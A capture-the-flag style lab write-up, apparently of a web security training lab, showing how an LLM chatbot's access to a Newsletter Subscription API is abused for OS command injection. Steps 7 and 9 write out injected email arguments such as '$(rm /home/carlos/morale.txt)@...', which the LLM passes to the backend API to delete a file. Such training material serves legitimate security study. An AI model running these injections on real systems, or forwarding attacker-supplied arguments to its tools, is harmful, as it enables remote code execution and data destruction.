26.2 Lab: Exploiting vulnerabilities in LLM APIs

This lab contains an OS command injection vulnerability that can be exploited via its APIs. You can call these APIs v ia the LLM. To solve the lab, delete the morale.txt file from Carlos’ home directory | Karthikeyan Nagaraj

Karthikeyan Nagaraj
2 min readMay 30, 2024

Description

This lab contains an OS command injection vulnerability that can be exploited via its APIs. You can call these APIs v ia the LLM. To solve the lab, delete the morale.txt file from Carlos’ home directory.

Solution

  1. From the lab homepage, click Live chat.
  2. Ask the LLM what APIs it has access to. The LLM responds that it can access APIs controlling the following functions:
    * Password Reset
    * Newsletter Subscription
    * Product Information
  3. Consider the following points:
    * You will probably need remote code execution to delete Carlos’ morale.txt file. APIs that send emails sometimes use operating system commands that offer a pathway to RCE.
    * You don’t have an account so testing the password reset will be tricky. The Newsletter Subscription API is a better initial testing target.
  4. Ask the LLM what arguments the Newsletter Subscription API takes.
  5. Ask the LLM to call the Newsletter Subscription API with the argument attacker@YOUR-EXPLOIT-SERVER-ID.exploit-server.net.
  6. Click Email client and observe that a subscription confirmation has been sent to the email address as requested. This proves that you can use the LLM to interact with the Newsletter Subscription API directly.
  7. Ask the LLM to call the Newsletter Subscription API with the argument $(whoami)@YOUR-EXPLOIT-SERVER-ID.exploit-server.net.
  8. Click Email client and observe that the resulting email was sent to carlos@YOUR-EXPLOIT-SERVER-ID.exploit-server.net. This suggests that the whoami command was executed successfully, indicating that remote code execution is possible.
  9. Ask the LLM to call the Newsletter Subscription API with the argument $(rm /home/carlos/morale.txt)@YOUR-EXPLOIT-SERVER-ID.exploit-server.net. The resulting API call causes the system to delete Carlos' morale.txt file, solving the lab.

--

--

Karthikeyan Nagaraj

Security Researcher | Bug Hunter | Web Pentester | CTF Player | TryHackme Top 1% | AI Researcher | Blockchain Developer